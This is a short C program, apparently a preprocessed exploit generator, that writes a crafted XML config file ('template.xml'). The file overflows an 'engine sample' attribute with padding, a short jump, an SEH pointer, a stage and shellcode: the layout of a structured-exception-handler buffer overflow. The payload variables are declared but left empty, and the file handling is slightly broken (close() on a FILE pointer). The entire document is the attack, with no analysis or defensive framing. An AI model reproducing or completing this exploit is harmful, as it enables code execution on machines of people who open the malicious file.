
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int FILE ;


 int close (int *) ;
 int * fopen (char*,char*) ;
 int fprintf (int *,char*,...) ;
 int printf (char*,char*) ;
 int putc (char,int *) ;
 char* seh_pointer ;
 char* shellcode ;
 char* short_jump ;
 char* stage ;

int main(int argc, char **argv) {

    FILE *save_fd;
    int i=0;

    save_fd = fopen("template.xml", "a+");

    if (save_fd == ((void*)0)) {
     printf("Failed to open '%s' for writing", "template.xml");
     return -1;
    }

    fprintf(save_fd, "<section name=\"Sound\">\n"
       "<attstr name=\"engine sample\" val=\"");
    for(i=0; i < 1529; i++) {
     putc('\x41', save_fd);
    }
    fprintf(save_fd, "%s", short_jump);
    fprintf(save_fd, "%s", seh_pointer);
    for(i=0; i < 0x22; i++) {
     putc('\x41', save_fd);
    }
    fprintf(save_fd, "%s", stage);
    for(i=0; i < 8; i++) {
     putc('\x41', save_fd);
    }
    fprintf(save_fd, "%s", shellcode);
    fprintf(save_fd, "\"/>\n");
    fprintf(save_fd, "<attnum name=\"rpm scale\" val=\"0.35\"/>\n");
    fprintf(save_fd, "</section>\n");
    fprintf(save_fd, "</params>\n");

    close(save_fd);

    return 0;
}
